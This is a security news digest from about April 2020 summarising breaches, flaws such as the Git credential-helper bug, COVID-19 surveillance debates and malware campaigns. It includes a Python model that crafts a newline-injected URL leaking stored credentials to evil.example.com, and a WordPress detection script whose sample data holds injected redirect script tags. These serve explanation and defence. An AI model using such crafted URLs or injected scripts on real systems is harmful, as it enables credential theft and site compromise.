Table of Contents

  1. Breaches
    1. New York State Investigates Network Hack
  2. Vulnerabilities
    1. Malicious URLs may cause Git to present stored credentials to the wrong server
    2. Exploit for Zoom Windows zero-day being sold for $500,000
    3. OneTone Vulnerability Leads to JavaScript Cookie Hijacking
    4. Microsoft Office April security updates fix critical RCE bugs
    5. Unpatched High-Severity Vulnerability in Widget Settings Importer/Exporter Plugin
    6. TikTok Vulnerability Enables Hackers to Show Users Fake Videos
    7. Multiple fiber routers are being compromised by botnets using 0-day
    8. What’s a 10? Pwning vCenter with CVE-2020-3952
  3. Privacy
    1. Mass surveillance alone will not save us from coronavirus
    2. Netzpolitik response to COVID-19 contact tracing
  4. Politics
    1. COVID-19 Has United Cybersecurity Experts, But Will That Unity Survive the Pandemic?
    2. Guidance on the North Korean Cyber Threat
    3. China to ban online gaming, chatting with foreigners outside Great Firewall
  5. Malware
    1. Lokibot with AutoIt Obfuscator + Frenchy Shellcode
    2. Lampion malware: what it is, how it works and how to prevent it
    3. Cyber security researchers uncover hidden backdoors and secret commands in 12,000 Android apps
    4. Coronavirus Update App Leads to Project Spy Android and iOS Spyware
    5. Multistage FreeDom Loader Used to Spread AZORult and NanoCore RAT
  6. Ransomware
    1. Nemty Ransomware shuts down public RaaS operation, goes private

Breaches

New York State Investigates Network Hack

In January, hackers compromised portions of the New York state government's computer network by taking advantage of an unpatched vulnerability in Citrix enterprise software, according to the Wall Street Journal. While the New York State Office of Information Technology Services discovered the hacking incident on Jan. 28, officials did not disclose the breach until Monday, after the Journal and other publications asked about it. The attack disabled some state agency information systems and took nearly a month to resolve, according to the Albany Times Union.

Vulnerabilities

Malicious URLs may cause Git to present stored credentials to the wrong server

Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing.
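To make the injection concrete, here is an added Python model of the exchange (example code written for this digest, not Git's own source or the patch). It is a simplified stand-in for how Git turns a URL into the key=value request it pipes to a credential helper, paired with a mock helper that reads that request the way the protocol specifies (one key=value per line, blank line terminates, a repeated key replaces the earlier value). The URL, the credential store and the password are constructed for the demo; the hardened variant rejects any decoded component that carries a line break or NUL, which is the shape of the upstream fix (tracked as CVE-2020-5260).

```python
from typing import Optional, Tuple
from urllib.parse import urlsplit, unquote

# Constructed credential store for the demo (host -> (username, password)).
# Stands in for the OS keychain a real helper would query.
STORE = {"good.example.com": ("alice", "hunter2-for-good")}

# Hypothetical malicious URL: git will connect to evil.example.com, but the
# percent-encoded newline (%0a) smuggles a second "host=" line into the
# request that the credential helper reads.
MALICIOUS_URL = "https://evil.example.com/?%0ahost=good.example.com"


class InjectionError(ValueError):
    """Raised by the hardened serializer when a URL component is unsafe."""


def serialize_request(url: str, hardened: bool) -> str:
    """Build the key=value stream git hands to a credential helper's 'get'.

    Simplified model of git's URL-to-credential conversion: components are
    percent-decoded and written one per line, terminated by a blank line.
    hardened=False reproduces the bug (a decoded newline is written verbatim);
    hardened=True rejects any component containing a line break or NUL.
    """
    parts = urlsplit(url)
    fields = [("protocol", parts.scheme), ("host", unquote(parts.hostname or ""))]
    path = parts.path + ("?" + parts.query if parts.query else "")
    path = unquote(path.lstrip("/"))
    if path:
        fields.append(("path", path))
    if parts.username:
        fields.append(("username", unquote(parts.username)))
    if hardened:
        for key, value in fields:
            if any(c in value for c in "\r\n\0"):
                raise InjectionError(f"line break or NUL in URL component {key!r}")
    return "".join(f"{key}={value}\n" for key, value in fields) + "\n"


def helper_get(stream: str) -> Optional[Tuple[str, str]]:
    """Model of a credential helper's 'get' action.

    Lines are key=value up to the first blank line; a repeated key replaces
    the earlier value, which is exactly what the injected 'host=' line relies on.
    """
    request = {}
    for line in stream.split("\n"):
        if line == "":
            break
        key, _, value = line.partition("=")
        request[key] = value
    return STORE.get(request.get("host", ""))


def credentials_sent_to(url: str, hardened: bool) -> Tuple[str, Optional[Tuple[str, str]]]:
    """Return (host git actually connects to, credentials the helper handed back).

    A mismatch between the two is the vulnerability: the helper looked up
    one host while the HTTP request goes to another.
    """
    connect_host = urlsplit(url).hostname or ""
    creds = helper_get(serialize_request(url, hardened))
    return connect_host, creds


if __name__ == "__main__":
    # Vulnerable: talks to evil.example.com, sends good.example.com's password.
    print(credentials_sent_to(MALICIOUS_URL, hardened=False))
    try:
        credentials_sent_to(MALICIOUS_URL, hardened=True)
    except InjectionError as err:
        print("rejected:", err)
```

Run it and the vulnerable path returns evil.example.com alongside alice's stored password, while the hardened path refuses the URL before anything reaches the helper. The same newline trick applies to any percent-encoded component, not just the query, which is why the check covers every field rather than only the path.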

Exploit for Zoom Windows zero-day being sold for $500,000

An exploit for a zero-day remote code execution vulnerability in the Zoom Windows client is being offered for $500,000, bundled with a second exploit for a bug in the platform's macOS client. Neither exploit nor its source code is public, but people active in the zero-day market told Motherboard, which first reported the story, that they "have been contacted by exploit brokers offering them for sale".

OneTone Vulnerability Leads to JavaScript Cookie Hijacking

A vulnerability in the discontinued WordPress theme OneTone has been added to an ongoing campaign that targets vulnerable WordPress sites and redirects visitors through domains like ischeck[.]xyz. This wave exploits the theme's XSS flaw to inject malicious JavaScript that sends visitors to the attacker's landing page. The same payload also checks for an existing logged-in admin session and, when it finds one, uses it to create a new administrator account that serves as a backdoor later.

Microsoft Office April security updates fix critical RCE bugs

Microsoft released the April 2020 Office security updates on April 14, 2020: 55 security updates and 5 cumulative updates across 7 products, fixing 5 critical bugs that let attackers run scripts as the current user and execute arbitrary code remotely on unpatched systems. Redmond also shipped the April 2020 Patch Tuesday updates the same day, covering 113 vulnerabilities, 15 rated Critical and 93 Important, including three zero-days, two of which were being exploited in the wild.

Unpatched High-Severity Vulnerability in Widget Settings Importer/Exporter Plugin

On March 12, 2020, the Wordfence team discovered a stored Cross-Site Scripting (XSS) vulnerability in Widget Settings Importer/Exporter, a WordPress plugin with over 40,000 installations. The flaw lets an authenticated attacker with minimal, subscriber-level permissions import and activate custom widgets containing arbitrary JavaScript on any site with the plugin installed. Because the vendor never responded, Wordfence moved to full disclosure, and the plugin has since been removed from the WordPress repository.
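Both WordPress items above end in the same place: script injected into site content that redirects or loads from an attacker's domain, and an administrator account created through a hijacked session. The following is an added hunting script for this digest, not code from the researchers or either plugin, that runs over constructed sample rows shaped like what `wp db query` returns from wp_options, wp_posts and wp_users. The allowlist, the sample rows, the "wp_support" account and the dates are all made up; the redirect domain is the one named in the OneTone report.

```python
import re
from datetime import datetime
from typing import Dict, List, Set, Tuple

# Constructed sample data: rows as they might be exported from wp_options /
# wp_posts (content fields) and wp_users (joined with the role capability).
# None of this comes from a real site.
SAMPLE_CONTENT: List[Dict[str, str]] = [
    {"table": "wp_options", "id": "theme_mods_onetone",
     "value": '<script src="https://ischeck.xyz/jquery.js"></script>'},
    {"table": "wp_posts", "id": "42",
     "value": '<p>Hello</p><script src="https://cdn.example-site.com/app.js"></script>'},
    {"table": "wp_posts", "id": "43",
     "value": '<script>window.location.href="//ischeck.xyz/?r="+document.referrer;</script>'},
    {"table": "wp_posts", "id": "44", "value": "<p>plain post</p>"},
]
SAMPLE_USERS: List[Dict[str, str]] = [
    {"login": "owner", "role": "administrator", "registered": "2018-05-01 09:00:00"},
    {"login": "wp_support", "role": "administrator", "registered": "2020-04-12 03:14:07"},
    {"login": "reader", "role": "subscriber", "registered": "2020-04-12 03:20:00"},
]

# <script ... src="https://host/..."> or protocol-relative "//host/..."; captures host.
EXTERNAL_SCRIPT = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([a-z0-9.-]+)", re.I)
# Inline redirect primitives commonly used by injected JavaScript.
INLINE_REDIRECT = re.compile(
    r"\blocation(?:\.href)?\s*=|location\.replace\(|document\.write\(", re.I)


def find_injected_scripts(rows: List[Dict[str, str]],
                          allowed_hosts: Set[str]) -> List[Tuple[str, str, str]]:
    """Flag content rows that load script from a host outside the allowlist
    or contain an inline redirect. Returns (table, id, reason) triples."""
    findings = []
    for row in rows:
        value = row["value"]
        for host in EXTERNAL_SCRIPT.findall(value):
            host = host.lower()
            if host not in allowed_hosts:
                findings.append((row["table"], row["id"], "external script: " + host))
        if INLINE_REDIRECT.search(value):
            findings.append((row["table"], row["id"], "inline redirect"))
    return findings


def find_recent_admins(users: List[Dict[str, str]], since: datetime) -> List[str]:
    """Return logins of administrator accounts registered at or after `since`.
    A backdoor admin created through a hijacked session shows up here; the
    subscriber that registered the same night does not."""
    return [
        u["login"] for u in users
        if u["role"] == "administrator"
        and datetime.strptime(u["registered"], "%Y-%m-%d %H:%M:%S") >= since
    ]


if __name__ == "__main__":
    allow = {"cdn.example-site.com"}           # hosts the site legitimately uses
    for hit in find_injected_scripts(SAMPLE_CONTENT, allow):
        print("content:", hit)
    for login in find_recent_admins(SAMPLE_USERS, datetime(2020, 4, 1)):
        print("new admin:", login)
```

The allowlist is the part that needs real work on a live site: build it from the script hosts the theme and plugins are known to use, then treat anything else as a finding to review rather than an automatic verdict. Pair the database scan with a check of theme and plugin files on disk, since the same campaign writes to both.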

TikTok Vulnerability Enables Hackers to Show Users Fake Videos

Two researchers made it appear that popular TikTok accounts had posted misleading content by taking advantage of the service's lack of TLS. TikTok, a Chinese video-sharing social network, has been delivering video and other media over plain HTTP rather than TLS/SSL, which means anyone on the network path (a hostile Wi-Fi hotspot, an ISP, or a DNS hijack) can tamper with the content before it reaches the app, the researchers say.

Multiple fiber routers are being compromised by botnets using 0-day

360 Netlab has published a blog post documenting a new 0-day, a remote command execution vulnerability in Netlink GPON routers, that is being exploited to spread the Moobot botnet.

What’s a 10? Pwning vCenter with CVE-2020-3952

Last Thursday, VMware published a security advisory for CVE-2020-3952, describing a "sensitive information disclosure vulnerability in the VMware Directory Service (vmdir)". The advisory is terse and says little beyond that, other than that any vCenter Server 6.7 upgraded from a previous version is vulnerable. What is striking is the CVSS score: 10.0, the maximum. The vulnerability allows an attacker with network access to a vCenter Server's LDAP service to take full control of the vCenter: they can create a fully privileged user in the vCenter directory, which in turn gives them control of the whole VMware deployment.

Privacy

Mass surveillance alone will not save us from coronavirus

As the pattern-shattering truth of our new lives weighs heavily, with coronavirus upending routines, eroding wellbeing, and whiplashing us between anxiety and fear, we should not look to mass digital surveillance to bring us back to normal. Governments are now openly mining mobile-phone location data to track the spread of COVID-19. Privacy advocates around the world have sounded the alarm. This month, more than 100 civil and digital rights organizations urged that any government's coronavirus-targeted surveillance respect human rights. The groups, which included Privacy International, Human Rights Watch, Open Rights Group, and the Chilean nonprofit Derechos Digitales, wrote in a joint letter: "Technology can and should play an important role during this effort to save lives, such as to spread public health messages and increase access to health care. However, an increase in state digital surveillance powers, such as obtaining access to mobile phone location data, threatens privacy, freedom of expression and freedom of association, in ways that could violate rights and degrade trust in public authorities - undermining the effectiveness of any public health response."

Netzpolitik response to COVID-19 contact tracing

Netzpolitik has written a series of posts in German in response to the contact tracing approach proposed by Apple and Google and to the tracing measures implemented independently by several governments.

Politics

COVID-19 Has United Cybersecurity Experts, But Will That Unity Survive the Pandemic?

The coronavirus has prompted thousands of information security professionals to volunteer their skills in upstart collaborative efforts aimed at frustrating cybercriminals who seek to exploit the crisis for financial gain. Whether it's helping hospitals avoid becoming the next ransomware victim or kneecapping new COVID-19-themed scam websites, these nascent partnerships may well end up saving lives. But can this unprecedented level of collaboration survive the pandemic? At least three major industry groups are working to counter the latest cyber threats and scams. Among the largest in terms of contributors is the COVID-19 Cyber Threat Coalition (CTC), which comprises roughly 3,000 security professionals collecting, vetting and sharing intelligence about new threats.

Guidance on the North Korean Cyber Threat

The U.S. Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation are issuing this advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The advisory highlights the cyber threat posed by North Korea, formally the Democratic People's Republic of Korea (DPRK), and provides recommended steps to mitigate it. In a DPRK Cyber Threat Advisory issued the same day, the U.S. Department of State says it will pay up to $5 million for information on DPRK hackers' activity, past or ongoing, if it leads to the identification or location of North Korean actors or the disruption of DPRK-related illicit activities.

China to ban online gaming, chatting with foreigners outside Great Firewall

After blocking the popular Nintendo game "Animal Crossing," the Chinese Communist Party (CCP) is taking its political censorship further by cutting Chinese online gamers off from their guildmates outside China. On April 10, China banned the social simulation game, in which players build a home and interact with cute animal villagers, after Hong Kong pro-democracy activist Joshua Wong showed off a custom in-game scene reading "Free Hong Kong" that mocked Chinese leader Xi Jinping. Several other players were also found using the game to vent their discontent with the CCP and to make satirical content about the CCP's failure to contain the virus.

Malware

Lokibot with AutoIt Obfuscator + Frenchy Shellcode

During the first week of March, Morphisec intercepted and blocked an advanced Lokibot delivery campaign against some of its customers in the financial sector. Lokibot has recently been reported arriving disguised as a well-known game launcher; before that it was delivered through AutoIt-obfuscated Frenchy shellcode. In the campaign Morphisec identified, the AutoIt plus Frenchy shellcode chain is back with new additions. The post walks through the technical details and points out what is new in this campaign.

Lampion malware: what it is, how it works and how to prevent it

The Lampion malware is spread through emails containing a link that downloads a .zip archive of malicious files. It is a banking Trojan: criminals built it to steal information about banking portals from the victim's device and to carry out fraudulent transactions. This kind of malware is a hard problem for a bank's security team because the fraudulent sessions originate from the victim's own device, which the bank treats as trusted.

Cyber security researchers uncover hidden backdoors and secret commands in 12,000 Android apps

Mobile apps are part of our daily routine, and anyone with a smartphone has downloaded and installed a variety of them, whether games, delivery or streaming apps. While most of these apps appear harmless to a typical user, researchers from Ohio State University, New York University and the CISPA Helmholtz Center for Information Security analyzed the top 150,000 Android apps and uncovered hidden backdoors and suspicious behavior in 12,706 of them.

Coronavirus Update App Leads to Project Spy Android and iOS Spyware

Trend Micro discovered a potential cyberespionage campaign, which it named Project Spy, that infects Android and iOS devices with spyware. Project Spy uses the ongoing coronavirus pandemic as a lure, posing as an app called Coronavirus Updates. On further investigation, the researchers also found similarities with two older samples, one disguised as a Google service and a later one disguised as a music app.

Multistage FreeDom Loader Used to Spread AZORult and NanoCore RAT

In March 2020, ThreatLabz observed several Microsoft Office PowerPoint files being used in the wild by a threat actor to spread AZORult and NanoCore RAT. The malicious files in this campaign use a payload delivery method that sets them apart from the common delivery chains seen daily. The infection chain is modular, with multiple stages before the final payload executes on the machine.

Ransomware

Nemty Ransomware shuts down public RaaS operation, goes private

The Nemty Ransomware is shutting down its public Ransomware-as-a-Service (RaaS) operation and switching to an exclusive private operation where affiliates are hand-selected for their expertise. Nemty has historically been a public RaaS, which is a service where ransomware operators are in charge of developing the ransomware and payment site, and affiliates join to distribute and infect victims. As part of this arrangement, the ransomware operators receive a 30% cut and an affiliate receives 70% of the ransom payments they brought in.